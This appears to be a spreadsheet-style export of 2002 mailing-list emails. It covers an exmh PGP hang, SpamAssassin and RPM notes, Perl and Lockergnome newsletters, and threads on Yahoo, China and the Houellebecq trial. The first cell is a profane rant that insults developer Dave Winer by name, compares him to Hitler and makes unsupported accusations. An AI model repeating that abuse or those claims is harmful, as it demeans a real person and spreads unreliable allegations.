    <t>This is for those that have interacted with D Winer\n\n"Dave's idea of love is fucking everyone else without so much as a reach\naround.  You're supposed to just shut up and take it."\n\n[URL]http://winerlog.inspiredsites.net[/URL]\n\n===========\n\nWho's the real monster?\n\n\nIt seems good Ol' Uncle Dave is once again trying to savage anyone that\ndares to disagree with him.  It seems Ben, Kevin and Bill are making too\nstrong a case.  So here we Dave's attempt to fool you into thinking they're\nsome sort of monsters, violent ones no less.\n\nAnyone who works with Hemenway or Kearney should be aware that these people\nare nothing less than monsters, who will stoop to any level to get their\nway.\n\nYeah sure Dave, whatever you need to believe.\n\nThe truth is these folks do a fine job of actually helping others and\nimproving RSS in general.  Each with their own brand of attitude, to be\nsure, but they seem to be pretty focused on actually helping things move\nforward.  How is that being monstrous?\n\nIs Dave trying to slander their good names and thus poison the public's\nperception of them?  If you haven't already, contact them and ask them how\nthey feel about this foolishness.\n\n\n 9/18/02; 10:07:38 AM - Discuss\n\n\n\nDave deflects what he can't take the time to understand\n\n\nIt's really quite pitiful.  When normal people don't understand something\nthey usually try learning about it.  They read up, ask questions and seek\nthe help of those that understand it.  This before shooting their mouths off\nand looking like fools.\n\nWhat Dave does is just the opposite.\n\nPosts a link to something he doesn't understand\nGet's a bunch of e-mail from people who do understand it\nDerides the idea as being 'too much trouble' and blogs it.\nExpects others to do research for him\nAbuses anyone who tries to help him\nPontificates, incorrectly, about only part of the issue\nRealizes he's been a fool but refuses to correct himself\nPlods forward pedantically trying to defend his idiocy\nTries making the educated people look like fools.\nSends private e-mails to them trying to scare them off.\nExposes any private e-mail they write, out of context.\nDeflects and runs off to some new topic, repeats from #1\nHis continued diatribes about RSS-1.0 and it's use of RDF reveal this to be\ntrue.  Dave doesn't get the idea of the semantic web.  He'd rather have you\nfollow his stupid ideas than dare admit that the work of others is worth\ntrying.\n\nOne reader wrote to us with a good analogy.  "It's like that movie The\nPoseidon Adventure.  Dave's like the purser ranting and raving that the\npassengers should follow him and march toward the bow.  I don't know about\nyou but I'd rather be with the fat lady swimming toward the engine room.\nThe ship's fucking sinking and I don't want to be following the idiot."\n\nDave's idea of love is fucking everyone else without so much as a reach\naround.  You're supposed to just shut up and take it.  After all, why would\ngood ol' Uncle Dave want to hurt you?  It's all about love, right?  To hell\nwith asking you if you want to get shafted.  And if you dare complain, he\nsavages you.  Then he tries to make everyone think you're the one causing\nall the trouble.\n\nWe've news for you Dave, we're wise to your tactics and we're talking\namongst ourselves about it.  We're routing around you damaging behavoir.\nThat's where we're coming from.\n\nIf you have an example of how you've tried to help Dave, please drop us an\ne-mail about it.  We'll keep it strictly confidential of course.  Send it\nalong to zaphod@egroups.com\n\n\n 9/12/02; 10:13:11 AM - Discuss\n\n\n\n\nTrying to talk with Dave is like trying to wrestle a pig...\n\n\nThe trouble is, you get dirty and the pig seems to like it.\n\nAnother developer tries talking to Dave and discovers it's fundamentally\nimpossible:\n\nHis basic response was just that RDF was a joke and the Semantic Web\ndevelopers are doing a terrible job.\n\nIn the span of less than five minutes Dave makes such an ass of himself that\npeople at other tables start whispering "that guy is an idiot..."\n\nThe zaphodim, however, are veteran pig wrestlers.  If you've got a similar\ntale from the mud pit, be sure to drop us a line at: zaphod@egroups.com.\n\n\n 9/11/02; 2:17:58 PM - Discuss (1 response)\n\n\n\n\nAha! Some backing down by the whining one?\n\n\nIt would appear the 'dictator release' strategy that Dave's been trying on\nhis crappy little set of RSS hacks is failing to gain support.\n\nI'm going to push back the caveat-removing on the 2.0 spec by 24 hours.\nStill have work to do on the sample file, I want to look into the RFC for\ntime-date specs, and get started on the Radio implementation of 2.0. I have\nto prepare for Seybold tomorrow, and I want to a little memorial for 9-11. A\nbusy few days for a guy still recovering. Also, it would be great if people\nwho make content tools could review the 2.0 spec and see if there are any\ndeal-stoppers.\n\nHell yeah there are deal stoppers, like nobody wants it nor will they use\nit!\n\nThe poor Radio customers!  The poor Salon blog users!  They're going to be\ndragged unwillingly into producing XML content that nobody will use!  So\nwith the flip of his mighty upgrade switch Dave is going to turn all their\ncontent into totally unsupported garbage!!!\n\nYa better speak up now folks otherwise your content is going to start\ngetting rejected!\n\nOf course at the same time Dave tries to play the sympathy card.  What utter\nfucking nonsense.  This past weekend, the blogosphere excoriates him for his\n'blame America' bullshit.  Then the RSS community tells him to get stuffed\nwith his dictator release of RSS.  Now he's trying to pretend we should be\nnice to him because he's still recovering?\n\nUh, Dave, if you want to take a rest from the battle then stop picking\nfights.  We'll still kick your ass regardless.  That's what years of your\nabusing people has gotten you Dave.  No sympathy anymore, none whatsoever.\n\n\n 9/11/02; 1:56:10 PM - Discuss\n\n\n\n\nDave is Scary on 9/11\n\nPosted on Scripting News on 9/10/2002:\n\n\nNote: During the day tomorrow there will be no updates to Scripting News.\nI'll be in SF at Seybold, leading a discussion on Web Services for\nPublishing with people from Amazon, Apple, Google and Jake Savin of\nUserLand. I may be able to update my Radio weblog, but only if there's\nsomething really important to report. So best wishes for a happy and safe\n9-11.\nWhat kind of asshole wishes people a happy 9/11??!?!?!?!??!! Obviously\nsomeone who doesn't have a clue nor lost anyone in the tragedy.\n\n\n 9/11/02; 7:56:06 AM - Discuss\n\n\n\n\nYeow and we though we were harsh!\n\n\nWow, apparently Dave's sticking his neck out quite far these days.  Craig\nSchamp practically keel-hauls him with this one.  He wraps it up with:\n\nThe man seems to show over and over that he's nothing more than a whining\nbuffoon\n\nGive that man an honorary Zaphodim membership card and secret decoder ring!\n\nRelated links over at PhotoDude, Richard Bennett, Andrea Harris, Reid Stott,\nJeff Jarvis, Ipse Dixit, and the Fat Guy.\n\n\n 9/9/02; 12:29:45 PM - Discuss\n\n\n\n\nRSS 2.0: code name "Hitler"\n\n\nIf Dave tries to steamroll RSS 2.0 through without formal community\nconsensus, here now we call it the "Hitler" release of 2.0.\n\n"No objections"?  No, he means "No objections I choose to hear."\n\nDave is simply not listening.  People are objecting all over.\n\n\n\n\n 9/6/02; 9:00:02 AM - Discuss\n\n\n\n\nReferral log funnies\n\n\nEvery now and then we check the referral logs to see what's pointing back to\nus.  We sincerely apologize to the pool soul that used this search.\n\n\n 9/5/02; 12:15:07 PM - Discuss\n\n\n\n\nLuserland Attempts to Trademark "RSS"\n\n\nDave has waxed and waned about intellectual property rights and how any\nBigCo that tries to patent its technology or methods is corrupt or morally\nbankrupt. Scripting News is full of examples.\n\nSo we found it surprising, as did many others, when Luserland software tried\nto patent the term 'RSS' back in 2000. Here's the patent application:\n\n[URL]http://tarr.uspto.gov[/URL]\n\nThis was apparently just between the start of the RSS 1.0 development\nefforts, and the publication of the specification. Winer knew about the RSS\n1.0 stuff - indeed, he complained about it bitterly at the time.\n\nCould Dave be any more transparent?!?!??!?!!!!!!!\n\nSince when has Dave been required to follow anything he says he wants others\nto do??? A good quote from before he filed the patent application:\n\nTim O'Reilly says patents are OK, he's just against stupid patents. In the\nspirit of Touch of Grey, Tim man, patents are lock-in of the worst kind.\nThere's no way to route around them.\n\n 9/4/02; 6:06:51 AM - Discuss\n\n\n\n\nWhen's a Permalink not a Permalink?\n\n\nWhen Dave writes an item, then removes it!!!!!!!!!!! The permalink links to\nnothing at that point. So apparently the "perma-" part in permalink is\npermanent. For everyone except Dave. Too bad his little attempt at a\ndefinition fails to mention this...!!!!!!!!!\n\n\n 9/2/02; 6:16:03 PM - Discuss</t>
  </si>
  <si>
    <t>http://winerlog.inspiredsites.net http://tarr.uspto.gov</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Reg Clemens &lt;reg@dwf.com&gt;\nDate: Wed, 18 Sep 2002 20:41:34 -0600</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 20:41:34 -0600</t>
  </si>
  <si>
    <t>Reg Clemens &lt;reg@dwf.com&gt;</t>
  </si>
  <si>
    <t>(PGP problem) EXMH hangs during 'Query keyserver'</t>
  </si>
  <si>
    <t>I guess the first question here should be does anyone have some\nupdates to the PGP code in EXMH that I should know about?\n\nMy current problem is that if I get a PGP signed message, I first\nget a button that reads:\n	"Check the signature with GnuPG"\nIf I punch the button, and I dont have the signature on my keyring\nthen I get a message saying just that, and the message:\n	"Can't check signature: public key not found"\nalong with a button with the inscription\n	"Query keyserver"\nIf I punch the button then EXMH just hangs.  Forever.\n\nIf instead of punching the button, I go out to the keyserver myself\nand then try the message again, everything works, so it SEEMS that it\nmust be the code that goes out to the keyserver.\n\nAnyone else with this problem?\nThis is EXMH v2.5 and tcl/tk 8.4a4\n-- \n                                        Reg.Clemens\n                                        reg@dwf.com\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 18 Sep 2002 18:39:11 -0400</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 18:39:11 -0400</t>
  </si>
  <si>
    <t>AA Meetings the Hottest Place to Meet Women With Big Bucks</t>
  </si>
  <si>
    <t>Church, AA, same diff? ;-). Cheers, RAH [URL]http://www.newsmax.com[/URL] NewsMax.com Wednesday, September 18, 2002 AA Meetings the Hottest Place to Meet Women With Big Bucks If you're looking to hook up with female millionaires you could try some of the classier restaurants or clubs, but the best place of all is a certain New York City Alcoholics Anonymous meeting. According to a Details magazine story cited in the New York Post, "the No. 1 location to score a megabucks babe is an Alcoholics Anonymous center on [New York's] Upper East Side. "It's the choicest meeting in town, right next to the Ralph Lauren store" on Madison Avenue, which features "rich vulnerable women," the mag's October issue says. AA officials were not overjoyed by having the address of their meeting place published, or being cited as the "in" place for finding loaded women - or rather, women who are loaded. "The purpose of our meetings is to let people share their experiences and help others find sobriety. It is not a place to pick up women!" an AA spokesman told The Post. O.K. Return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www.newsmax.com</t>
  </si>
  <si>
    <t>To: RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 18 Sep 2002 16:50:20 +0200</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 16:50:20 +0200</t>
  </si>
  <si>
    <t>RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>New testing packages</t>
  </si>
  <si>
    <t>Hi, Just the kind of announce I make once in a while : - I've rebuilt a new "alsaplayer" package based on Angle's one. - I've rebuilt a hopefully final version "-fr8" of the "alsa-driver" and   "alsa-kernel" packages which fix all known SMP build issues. Both can be found here : [URL]http://ftp.freshrpms.net[/URL] I've also repackaged gkrellm 2.0.2 with at last a separate package for the server that can be installed standalone and doesn't even require glib2. [URL]http://ftp.freshrpms.net[/URL] Last but not least, my latest proftpd 1.2.6 package incorporates some nifty new features : You can use any of "--with ldap", "--with mysql" and "--with postgres" when rebuilding the source rpm with rpmbuild to enable desired extra authentication methods and all package requirements are set accordingly, and the release tag is changed too. [URL]http://valhalla.freshrpms.net[/URL] (the usual place ;-)) I think I'll use this "--with " switch more and more where possible. Some other of my package already use it like the xmame for its output targets, sqlrelay for its modules and my latest sylpheed claws spec to enable Pilot support. As usual, feedback and comments are welcome! :-) Matthias PS: Yup, I'm back from my holidays ;-) --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10 Load : 2.42 2.10 1.32, AC on-line, battery charging: 100% (7:12) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://ftp.freshrpms.net http://ftp.freshrpms.net http://valhalla.freshrpms.net http://freshrpms.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Ray Gardener" &lt;R.A.Gardener@shu.ac.uk&gt;\nDate: Wed, 18 Sep 2002 12:44:14 +0100</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 12:44:14 +0100</t>
  </si>
  <si>
    <t>"Ray Gardener" &lt;R.A.Gardener@shu.ac.uk&gt;</t>
  </si>
  <si>
    <t>[SAtalk] spamc and DCC</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0056_01C25F11.18554780 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi -=20 I upgraded to 2.40 (now 2.41) last week and the messages which are = definitely in the DCC database aren't being marked as such by = spamassassin when connected to via spamc. Interestingly it is detected = when running spamassassin -t &lt; sample-spam.txt (using the same userid = incidentally). Is this a known "feature" of spamc under 2.4x or is there = anything obvious that I am not implementing correctly? Note that as I = implied above this used to work under 2.3x of spamassassin and = spamd/spamc Regards Ray Gardener Sheffield Hallam University UK ------=_NextPart_000_0056_01C25F11.18554780 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi -  Â  IÂ upgraded to 2.40 (now 2.41) last = week and=20 the messages which are definitely in the DCC databaseÂ aren't being = marked=20 as such by spamassassin when connected to via spamc. Interestingly it is = detected when running spamassassin -t &lt; sample-spam.txt (using the = same=20 userid incidentally). Is this a known "feature" of spamc under 2.4x or = is there=20 anything obvious that I am not implementing correctly? Note that as I = implied=20 above this used to work under 2.3x of spamassassin and = spamd/spamc Â  Regards Â  Ray Gardener Sheffield Hallam = University UK Â  ------=_NextPart_000_0056_01C25F11.18554780-- ------------------------------------------------------- This SF.NET email is sponsored by: AMD - Your access to the experts on Hammer Technology! Open Source &amp; Linux Developers, register now for the AMD Developer Symposium. Code: EX8664 [URL]http://www.developwithamd.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.developwithamd.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Gary Lawrence Murphy &lt;garym@canada.com&gt;\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Wed, 18 Sep 2002 07:24:02 -0500 (CDT)</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 07:24:02 -0500 (CDT)</t>
  </si>
  <si>
    <t>Well I don't think China could force Yahoo! to give up info.  So if they \nare so willing to give it, why wouldn't they be willing to give info to \nsome silly group who may one day decide to get a hair up their ass about \nthe practice of BDSMers? (not to mention folks who don't even practice, \nbut who are just interested in information) What about folks who are \ninterested in talking about software security issues?  Didja read about \nthe guy in China who got 11 years for downloading and printing out pro-democracy \ninfo?\n[URL]http://www.democracy.org.hk[/URL]\nI'm confused about what you're confused about.\nCindy\n\nOn 18 Sep 2002, Gary Lawrence Murphy wrote:\n\n&gt; \n&gt; I'm a bit confused about this boycott thing.  How is what China is\n&gt; doing any different than having Scientology and who ever else\n&gt; state-side who takes the whim evoking the DMCA to close down foreign\n&gt; sites they deem inappropriate?  At least the Chinese make it voluntary\n&gt; and ask politely, rather than just sending legal musclemen first off.\n&gt; \n&gt; \n\n-- \n"I don't take no stocks in mathematics, anyway" --Huckleberry Finn</t>
  </si>
  <si>
    <t>http://www.democracy.org.hk</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Wed, 18 Sep 2002 07:13:36 -0400</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 07:13:36 -0400</t>
  </si>
  <si>
    <t>CDale wrote:\n&gt; \n&gt; I was wondering if anyone knows of an alternative that allows\n&gt; all the bells and whistles that yahoo has, such as reminders,\n&gt; file storage, calendars, etc.\n\nSmartGroups, I think.\n-- \n#ken	P-)}\n\nKen Coar, Sanagendamgagwedweinini  [URL]http://Golux.Com[/URL]\nAuthor, developer, opinionist      [URL]http://Apache-Server.Com[/URL]\n\n"Millennium hand and shrimp!"</t>
  </si>
  <si>
    <t>http://Golux.Com http://Apache-Server.Com</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 18 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-18</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Subscribe to The Perl Review\n\n+--------------------------------------------------------------------+\n| Subscribe to The Perl Review                                       |\n|   posted by pudge on Tuesday September 17, @08:00 (links)          |\n|   [URL]http://use.perl.org[/URL]               |\n+--------------------------------------------------------------------+\n\n[0]barryp writes "You can now pledge a subscription to [1]The Perl Review.\nThe plan is to produce four print magazines per year. Cost: $12/year\n(US); $20/year (international). Let's all make this happen by signing\nup!" The web site says that they'll attempt to go print if they get\nenough subscription pledges.\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:paul.barry@itcarlow.ie\n    1. [URL]http://www.theperlreview.com[/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theperlreview.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 18 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-18</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nSubscribe to The Perl Review\n    posted by pudge on Tuesday September 17, @08:00 (link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lt;fork@spamassassin.taint.org&gt;\nFrom: "Gordon Mohr" &lt;gojomo@usa.net&gt;\nDate: Wed, 18 Sep 2002 00:29:01 -0700</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 00:29:01 -0700</t>
  </si>
  <si>
    <t>Defending Unliked Speech Re: Hanson's Sept 11 message in the</t>
  </si>
  <si>
    <t>Robert Harley writes:\n&gt; Chuck Murcko wrote:\n\n&gt; &gt; But I must feel obligated to defend to the death your right to do so.\n&gt;\n&gt; Je dsapprouve ce que vous dites, mais je dfendrai jusqu' ma mort votre\n&gt; droit de le dire\n&gt; - Arouet Le Jeune, dit Voltaire (1694-1778).\n\nHere's hoping that tradition perseveres for the novelist\ncurrently on trial in Paris for calling Islam "the stupidest\nreligion"...\n\n[URL]http://ca.news.yahoo.com[/URL]\n\n# Tuesday September 17 11:07 AM EST\n#\n# French Writer Tried As Anti-Islam, Protest Erupts\n# By Caroline Brothers\n#\n# PARIS (Reuters) - Provocative French novelist Michel Houellebecq\n# faced a Paris court on Tuesday for allegedly inciting racial hatred\n# by calling Islam "the stupidest religion" and its holy book the\n# Koran a depressing read.\n#\n# The case, brought against him by four Muslim groups, is a cause\n# celebre reminiscent of the Salman Rushdie affair, pitting freedom of\n# expression against religious sensitivities.\n#\n# The Muslim groups, which include the Mecca-based World Islamic\n# League and the Paris Mosque, accuse the writer of insulting Islam in\n# an interview with the literary magazine "Lire" during last year's\n# launch of his novel "Plateforme."\n#\n# Lire is also on trial over the remarks, which have taken on an added\n# significance in France in the atmosphere of heightened sensitivity\n# and concern about Islam following the September 11 attacks by Muslim\n# radicals in the United States.\n#\n# Shortly after the trial started, 11 people in the courtroom stripped\n# off their shirts to reveal T-shirts saying "No to the censure of the\n# imams" and "Marianne veiled, Marianne raped" -- a reference to the\n# female symbol of the French republic.\n#\n# "Freedom of expression! freedom of expression!" they and other\n# Houellebecq supporters chanted after they were thrown out of the\n# courtroom at the main law courts in central Paris.\n#\n# While intellectuals argued before the trial that Houellebecq should\n# be free to write what he wants, Lyon Mosque rector Kamel Kabtan\n# retorted: "We are for freedom of expression, but not for insulting\n# communities."\n#\n# BETE NOIRE\n#\n# Houellebecq, 45, the bete noire of contemporary French literature,\n# is no stranger to controversy. He offended conservatives and the\n# politically correct left with his 1998 novel "Les Particules\n# Elementaires" ("Atomised" in English).\n#\n# Paris Mosque rector Dalil Boubakeur says Muslims have been insulted\n# once before by Houellebecq, who had the main character in Plateforme\n# admit he felt "a quiver of glee" every time a "Palestinian\n# terrorist" was killed.\n#\n# The World Islamic League, the Lyon Mosque and the National\n# Federation of Muslims in France have joined the Paris Mosque in\n# bringing Houellebecq to trial.\n#\n# France's Human Rights League joined them as a civil party, saying\n# Houellebecq's comments amounted to "Islamophobia" and deserved to be\n# sanctioned as part of the league's struggle against discrimination\n# and racism.\n#\n# The Paris Mosque has hired Jean-Marc Varaut, one of France's leading\n# trial lawyers, whose past clients include Maurice Papon, the former\n# official condemned in 1998 for Nazi-era crimes against humanity for\n# sending Jews to death camps.\n#\n# RESTORING BLASPHEMY?\n#\n# Houellebecq's lawyer Emmanuel Pierrat argues that the case\n# effectively re-establishes the notion of blasphemy, despite the fact\n# that France as a secular state has no such law, and says\n# Houellebecq's opponents want to deny him freedom of expression.\n#\n# He also argues that the interview in Lire truncated a six-hour\n# conversation and Houellebecq was not given the chance to approve the\n# article before it appeared.\n#\n# Houellebecq's publisher Flammarion has distanced itself from the\n# author, whose comments some say may have cost him France's\n# prestigious Goncourt prize -- for which he had been a contender.\n#\n# The novelist, who lives outside Cork, Ireland, writes in a detached\n# style about a bleak world in which people have forgotten how to\n# love.\n#\n# Translated into 25 languages, "Atomised" incensed France's 1968\n# generation with its scathing descriptions of the hippie era but won\n# him France's November prize in 1998 and the Impac award, one of the\n# world's biggest fiction prizes.\n#\n# Losing his case may mean a year in jail or a $51,000 fine.\n\n- Gordon</t>
  </si>
  <si>
    <t>http://ca.news.yahoo.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Digital Media &lt;subscriptions@lockergnome.com&gt;\nDate: Wed, 17 Jul 2002 23:39:29 -0500</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 23:39:29 -0500</t>
  </si>
  <si>
    <t>Lockergnome Digital Media &lt;subscriptions@lockergnome.com&gt;</t>
  </si>
  <si>
    <t>qqqqqqqqqq-lg@example.com</t>
  </si>
  <si>
    <t>[Lockergnome Digital Media]  Endorsed Compatibility</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![See You\nat Gnomedex\n2002!]([URL]http://www.lockergnome.com[/URL]  \n  \n---  \n|\n\n 07.17.2002 MediaREPORT  \n  \n---  \n  \n**GET WINDOWS XP TIPS:** Months after the release of Windows XP Professional\nand Home editions, people are still learning the nuances of Microsoft's newest\noperating system. Whether you've been using it for a while or are planning to\nupgrade to the new OS soon, this ebook is right up your alley. GET YOUR COPY\nof Lockergnome's Top 50 Windows XP tips now!  \n---  \n  \nThis is of course belated, as I'm sending it on the 18th, but Happy Birthday\nto Lori!\n\nOne thing about MacWorld should excite mp3 junkies -- the iPod just got even\nbigger, with a 20GB version and Apple officially endorses Windows\ncompatibility. Actually, the good news is, the 5GB and 10GB versions came down\nin price. Hearing that the only "officially" functional Windows player is\nMusicMatch Jukebox Plus is a serious downer, in my opinion. Sure, MusicMatch\nis a decent player, but with plenty of great free players on the market, why\ndo we want to purchase a software player in addition to the $299+ hardware\nunit?\n\nAt first glance, it looks like Apple is only paying lipservice to true Windows\ncompatibility. I've seen no mention of any additional functionality, besides\nsong management via one media playing utility. Mediafour's XPlay remains a\nbetter option, in my opinion. In addition to allowing you to use an iPod with\nalmost any media player made for Windows, it assists with contact management,\nvia Outlook vCards, in addition to making the iPod an additional drive on your\nPC. At a mere $10 more than MusicMatch Jukebox Plus, XPlay blows the doors off\nApple's officially endorsed player.\n\nLori and I made the five and a half hour drive to St. Louis for this year's\nSIC without a hitch. I just missed a face-to-face introduction to John Lal, of\nwinferno.com, although I'm sure we'll meet tomorrow. John's the guy behind the\nfree copy of Research-Desk for all Gnomedex attendees. Shortly after arrival,\nI enjoyed dinner with the eSellerate gang, with a discussion about GnomeTomes\nand what the future holds.\n\nEvery time I travel, I'm reminded just how slow dialup really is. Fortunately,\nmy Crosspaths.net connection allows me to send mail via my Lockergnome\naccount, unlike most of the national dialup services. Crosspaths is\ntechnically an Iowa ISP, although the have points of presence in almost every\nmajor city in the country. If you're a dialup user, you may want to take a\nlook at their offerings, regardless of where you live. Lori has used their DSL\nservice for two years now, and they've been nothing short of outstanding in\ndealing with customer service queries.\n\nJake Ludington  \n\n  \n\n GnomePRODUCER  \n  \n---  \n  \n**PNG Files Do Not Show Transparency in Internet Explorer (Q294714)**\n\n[URL]http://support.microsoft.com[/URL];en-us;Q294714\n\nThis originally appeared in last weeks Webmaster Weekly, but due to its\ngraphical nature, its worth inclusion here as well:\n\n"If you browse to a Web page that contains an image that has a transparent\nbackground in Portable Network Graphics (PNG) format, the image background may\nappear to be gray rather than transparent." Fortunately, Microsoft explains a\nsolution for this problem. Personally, I haven't encountered this PNG display\nerror, but for those of you simplementing PNGs on your sites, you'll want to\nreview the solution.\n\n  \n\n GnomeFEATURE  \n  \n---  \n  \n**Glitschka.com**\n\n[URL]http://www.glitschka.com[/URL]\n\nFlash animations, downloadable icons, artistic doodles, and details about the\nartist himself are available from this site. You're guaranteed to find\nsomething entertaining here, and if you need a logo designed, Von Robert\nGlitschka might even take you on as a client. The portfolio is extensive,\nincluding stock images and even some icons by the artist's seven year old\ndaughter. A must read is the anatomy of an illustration section, which lays\ndown artistic opinion, straight from Glitschka's mouth on how to make a funny\ncreation. The entertainment is accessible accross both Windows and Mac\nplatforms, with icons available in both Mac and PC versions.\n\n  \n\n GnomeSKIN  \n  \n---  \n  \n**Skin 2 forWinamp 3.x** by nnic  \n![](images/blank.gif) Posted on 7/17/02 10:43PM --  \n\n![Winamp 3.x by\nnnic]([URL]http://www.deskmod.com[/URL]\n\n[Download]  \-- [Zoom]  \-- [Visit DeskMod]\n\n  \n\nGet your copy of SkinStudio XP\n\n  \n\n GnomeAUDIO  \n  \n---  \n  \n**Fight Cloud**\n\n[URL]http://www.fightcloud.com[/URL]\n\nUnknown artists across a variety of genres offer free mp3 downloads of\nselected tracks, with an option to purchase songs on CD for the price of\nshipping and handling. All CDs are professionally mastered works, so you're\ngetting label quality releases, without the jacked-up retail price tag. The\nmp3s let you decide if the album is worth you $4.95. The only thing I find odd\nabout this site is their proclamation of paying artists 50% of distribution\nprofits, which I have to assume is 50% of zero, since the CDs are free. The\nartist selection contains some solid releases by talented artists, regardless.\n\n![TechTV's Computer\nBasics]([URL]http://www.lockergnome.com[/URL]\n**CHRIS TEACHES THE BASICS:** If you've got friends or family who want to\nlearn more about their PC, from a guy who makes things nice and easy, check\nout the VHS release of Computer Basics in the GnomeStore. Chris teams with\nTechTV cohort, Kate Botello, to lead novices on a journey through their\ncomputer. From basic interactions, to installing apps, to using the Internet\nand e-mail, Chris and Kate have all the basics covered. Help out a friend and\nget them a copy today.  \n---  \n  \n  \n\n GnomePLUGIN  \n  \n---  \n  \n**BBE Sonic Maximizer [3.22MB] W9X/W2K/XP $129**\n\n[URL]http://www.bbesound.com[/URL]\n\nFrom home recordings to downloaded mp3s, this DirectX plug-in brings back the\nclarity to your audio files. Bring back the live feel that gets lost in the\nrecording process, add depth to bass lines, and bring vocals to the front of\nyour audio mix where they belong. Compensate for frequency phase shifting,\ngiving your audio a kick in the pants. This is one post production tool you\nneed in your digital arsenal. Also available as a VST for Mac OS.\n\n  \n\n GnomeDVD  \n  \n---  \n  \n![DVD]([URL]http://images.lockergnome.com[/URL]  \nClick for Details  \n---  \n**Who's Afraid of Virginia Woolf?** (NR) 1966  \nAdapted Play - 131min  \nReviewer's Tilt (10)\n\n![]([URL]http://images.lockergnome.com[/URL]![]([URL]http://images.lockergnome.com[/URL]![]([URL]http://images.lockergnome.com[/URL]![]([URL]http://images.lockergnome.com[/URL]![]([URL]http://images.lockergnome.com[/URL]\n\nBefore directing Catch-22 and The Graduate, Mike Nichols made his big screen\ndebut directing this adroit adaptation of Edward Albee's play "Who's afraid of\nVirginia Woolf?" Nominated for thirteen, and winner of five, Academy Awards,\nthis dark tale centers on history professor George (Richard Burton), and his\nwife Martha (Elizabeth Taylor), daughter of the college president. At first\nGeorge and Martha appear to be the average Ozzie and Harriet, an aging, well-\nadjusted, educated couple, comfortable with their lives and their love. George\nand Martha quickly shatter this illusion, as they return from a faculty\ncocktail party, to exchange a caustic barrage of verbal barbs. Just as\nquickly, however, the couple turns witty and civil when the young new biology\nprofessor Nick (George Segal) and his shy, but pretty wife Honey (Sandy\nDennis) stop by for a nightcap. Unfortunately for Nick and Honey, the sardonic\nexchange does not disappear, it merely changed guise. Soon Nick and Honey find\nthemselves helpless pawns in the elder couple's sick-witted exchange.\nThroughout the remainder of the movie, George and Martha dance their finely\nchoreographed, oft-rehearsed dance of despise. The two alternate the lead,\nalternately dishing out and enabling the abuse, but they never miss a step.\nThankfully, writer Albee's sublime play translates to the big screen almost\nunadulterated. Taylor and Burton deliver his lines with great force and\nimpeccable timing. At one point George proposes "Now that we're through with\nHumiliate the Host...and we don't want to play Hump the Hostess yet...how\nabout a little round of Get the Guests?" This provides some idea of the\nprecarious twist of uncomfortable wit that drives the action from start to\nfinish. Albee's stellar writing notwithstanding, the real star of this film is\nTaylor and Burton's alchemy, converting Albee's words into cinematic gold. Ok,\nI will grant you that playing a pair of aging, drunk, selfish lovers may not\nhave been much of a stretch. Both actors, however, deliver their lines with\nthe chilling reality of a serial killer describing his most gratifying\nslaying. Often unpleasant and disturbing, this film never allows you to relax\nor look away. Simultaneously seamlessly smooth, and ingeniously rocky this is\nnot a "feel good" movie. "Who's Afraid of Virginia Woolf?" is, however, a\nmemorable film that will stick with you for years to come.\n\n  * Region 1 Encoding (US and Canada only) \n  * Format: Black and White, Widescreen Anamorphic, Closed Captioned \n  * Sound: (Dolby Digital 5.1) \n  * Production Notes \n\nReview by Brett Trout\n\n  \n\n GnomeWALLPAPER  \n  \n---  \n  \n**purple flower forWallPapers** by tatosh  \n![](/images/blank.gif) Posted on 7/17/2002 12:35:01 AM --  